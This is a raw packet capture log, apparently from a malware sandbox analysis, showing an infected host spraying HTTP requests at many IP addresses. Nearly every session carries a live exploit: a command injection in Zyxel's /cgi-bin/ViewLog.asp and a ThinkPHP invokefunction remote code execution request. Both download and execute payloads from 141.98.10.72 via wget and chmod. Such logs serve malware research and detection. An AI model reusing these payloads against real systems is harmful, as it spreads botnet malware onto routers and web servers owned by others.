66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, s

Session ID	Source IP	Source Port	Destination IP	Destination Port
896	192.168.2.15	60400	31.104.105.124	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.481455088 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.745784044 CET	626	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 431 Date: Wed, 14 Feb 2024 08:30:53 GMT Keep-Alive: timeout=5 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
897	192.168.2.15	58980	31.136.83.145	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.493603945 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:56.663599014 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:02.807460070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.839095116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:40.694444895 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
898	192.168.2.15	40482	94.122.197.199	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.521548033 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
899	192.168.2.15	49966	31.200.78.112	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.521717072 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
900	192.168.2.15	46354	95.164.62.167	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.678961992 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.881423950 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
901	192.168.2.15	56492	95.216.1.146	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.701423883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.935167074 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:30:53 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
902	192.168.2.15	33940	95.79.31.246	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.704866886 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:53.933424950 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 14 Feb 2024 08:30:47 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
903	192.168.2.15	40646	62.29.65.99	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.727003098 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
904	192.168.2.15	40942	94.120.25.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.728823900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
905	192.168.2.15	56358	94.120.247.21	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.728984118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
906	192.168.2.15	44854	94.120.17.172	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.730766058 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
907	192.168.2.15	42434	94.187.110.246	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.735723019 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
908	192.168.2.15	49484	95.131.76.82	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:53.736155987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:53.991583109 CET	324	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 Date: Wed, 14 Feb 2024 08:30:53 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
909	192.168.2.15	48434	95.209.131.43	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:54.242217064 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:57.079658985 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:00.503693104 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:07.415395975 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:20.983118057 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:48.886240959 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
910	192.168.2.15	59690	112.186.20.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:55.205815077 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
911	192.168.2.15	38722	95.43.238.159	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:55.714627981 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:55.944726944 CET	49	IN	HTTP/1.1 404 Site or Page Not Found
Feb 14, 2024 09:30:55.946590900 CET	309	IN	Data Raw: 53 65 72 76 65 72 3a 20 48 69 6b 76 69 73 69 6f 6e 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 57 65 64 20 46 65 62 20 31 34 20 31 30 3a 31 38 3a 35 39 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f Data Ascii: Server: Hikvision-WebsDate: Wed Feb 14 10:18:59 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not

Session ID	Source IP	Source Port	Destination IP	Destination Port
912	192.168.2.15	43514	31.136.22.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:56.235491991 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:56.855674028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
